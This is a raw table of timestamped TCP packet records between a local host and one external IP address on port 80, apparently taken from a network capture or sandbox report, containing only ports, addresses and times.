Nov 24, 2022 12:19:59.796529055 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796541929 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796554089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796577930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796597958 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796602964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796627998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796650887 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796665907 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796674013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796695948 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796699047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796725035 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796749115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796772003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796776056 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796797037 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796797991 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796833038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796850920 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.796857119 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796881914 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.796921968 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819067955 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819163084 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819204092 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819241047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819276094 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819309950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819344997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819349051 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819349051 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819379091 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819417000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819422960 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819452047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819469929 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819490910 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819525957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819559097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819576025 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819595098 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819606066 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819628954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819664001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819674969 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819700003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819735050 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819768906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819778919 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819804907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819814920 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819839001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819874048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819907904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819917917 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.819943905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819978952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.819988966 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820043087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820080996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820091009 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820117950 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820137024 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820156097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820195913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820233107 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820250988 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820269108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820281029 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820307016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820343018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820363045 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820379972 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820414066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820449114 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820470095 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820483923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820502043 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820519924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820555925 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820580006 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820610046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820656061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820700884 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820745945 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820748091 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820770025 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820794106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820837021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820879936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820893049 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.820924044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820966959 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.820976973 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821011066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821017981 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821058035 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821105003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821115017 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821149111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821193933 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821212053 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821240902 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821284056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821326971 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821333885 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821372032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821415901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821425915 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821460962 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821463108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821506977 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821549892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821593046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821609020 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821645975 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821696043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821711063 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821739912 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821739912 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821784973 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821829081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821840048 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821871996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821916103 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.821927071 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.821962118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822005987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822051048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822069883 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822093964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822137117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822153091 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822180033 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822185993 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822223902 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822267056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822278023 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822314978 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822357893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822370052 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822402954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822446108 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822489023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822498083 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822532892 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822576046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822587967 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822622061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822624922 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822668076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822710991 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822720051 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822753906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822797060 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822804928 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822839022 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822910070 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822954893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.822968006 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.822997093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823003054 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823039055 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823082924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823086023 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823124886 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823167086 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823174000 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823210001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823252916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823295116 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823306084 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823338985 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823383093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823389053 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823427916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823427916 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823473930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823518038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823527098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823564053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823610067 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823612928 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823652983 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823694944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823699951 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823740005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823785067 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823790073 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823827982 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823873043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823915958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.823920012 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.823960066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824002028 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824019909 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824045897 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824048042 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824090958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824135065 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824139118 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824178934 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824220896 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824227095 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824264050 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824306965 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824348927 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824368000 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824393034 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824407101 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824436903 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824481964 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824525118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824541092 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824579954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824628115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824644089 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824670076 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824676037 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824713945 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824759960 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824767113 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824804068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824847937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824861050 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.824892044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824938059 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824982882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.824996948 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825026035 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825069904 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825082064 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825114965 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825122118 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825160980 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825203896 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825233936 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825248957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825294018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825300932 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825341940 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825383902 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825426102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825433969 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825470924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825514078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825520039 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825557947 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825557947 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825604916 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825650930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825695992 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825706005 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825740099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825783968 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825788975 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825829029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825835943 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825871944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825916052 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.825926065 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.825961113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826009989 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826014042 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826054096 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826098919 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826142073 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826153040 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826185942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826231956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826236010 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826275110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826282024 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826318026 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826363087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826370955 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826407909 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826457024 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826459885 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826499939 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826545000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826586962 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826597929 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826632023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826637983 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826674938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826719046 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826725960 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826764107 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826806068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826839924 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826859951 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826898098 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.826904058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826950073 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.826992989 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827003002 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827039003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827083111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827086926 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827127934 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827169895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827219963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827234030 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827264071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827275038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827308893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827353001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827363968 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827399969 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827442884 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827451944 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827486038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827528954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827574015 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827584028 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827625036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827667952 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827677011 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827711105 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827718019 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827755928 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827799082 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827806950 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827841997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827884912 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827896118 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.827929020 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.827981949 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828026056 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828052044 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828073025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828109026 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828114033 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828142881 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828177929 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828202963 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.828212023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.828232050 CET	49708	80	192.168.2.3	66.235.200.147
